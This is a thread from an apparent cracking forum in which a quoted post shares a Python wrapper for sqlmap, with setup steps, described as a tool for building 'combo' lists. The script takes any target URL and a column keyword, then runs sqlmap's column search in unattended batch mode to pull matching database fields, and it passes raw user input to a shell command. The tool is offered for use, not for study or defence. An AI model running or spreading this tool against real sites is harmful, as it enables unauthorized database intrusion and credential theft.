This post is by a banned member (hakue) - Unhide
27 January, 2023 - 01:16 AM
Reply
This post is by a banned member (liamswrldv2) - Unhide
29 January, 2023 - 05:08 AM
Reply
(03 January, 2023 - 05:48 AM)Markoo Wrote: Show MoreLEAVE A LIKE SO I CAN SHARE MORE UHQ TOOL FOR COMBO ETC..
SUPPORT ME BY GIVING REP
How To Use :
1. Put The Script In Folder Sqlmap
2. Open CMD Use This Comand "cd directory link to SQLMAP" Like This
"cd C:\Users\Cracked\OneDrive\Desktop\sqlmapproject-sqlmap-e846209"
3. Now Just Type Main.py And Press Enter So You Can Use The Script Now !
Source Code :
Code:
from subprocess import PIPE, run
import os
from urllib.parse import urlparse
def out(command):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
return result.stdout
url = input('input url : ')
kw = input('collum kw : ')
e = f'python sqlmap.py -u "{url}" --search -C "{kw}" --answers="follow=Y" --batch'
out(e)
print("The Output should be in output folder")
ee= os.environ.get("USERNAME")
ur = urlparse(url).netloc
d = f"C:\\Users\{ee}\\AppData\\Local\\sqlmap\\output\\{ur}"
os.startfile(d)
blessings
This post is by a banned member (Pantei) - Unhide
31 January, 2023 - 08:49 AM
Reply
This post is by a banned member (mwzrt333) - Unhide
02 February, 2023 - 06:12 AM
Reply
This post is by a banned member (bizimmemleket1991) - Unhide
05 February, 2023 - 12:51 AM
Reply
This post is by a banned member (SAYNEY) - Unhide
09 February, 2023 - 04:44 PM
Reply
This post is by a banned member (2PXZ) - Unhide
OP 12 February, 2023 - 01:47 AM
Reply
This post is by a banned member (softnyx11) - Unhide
18 March, 2023 - 08:30 AM
Reply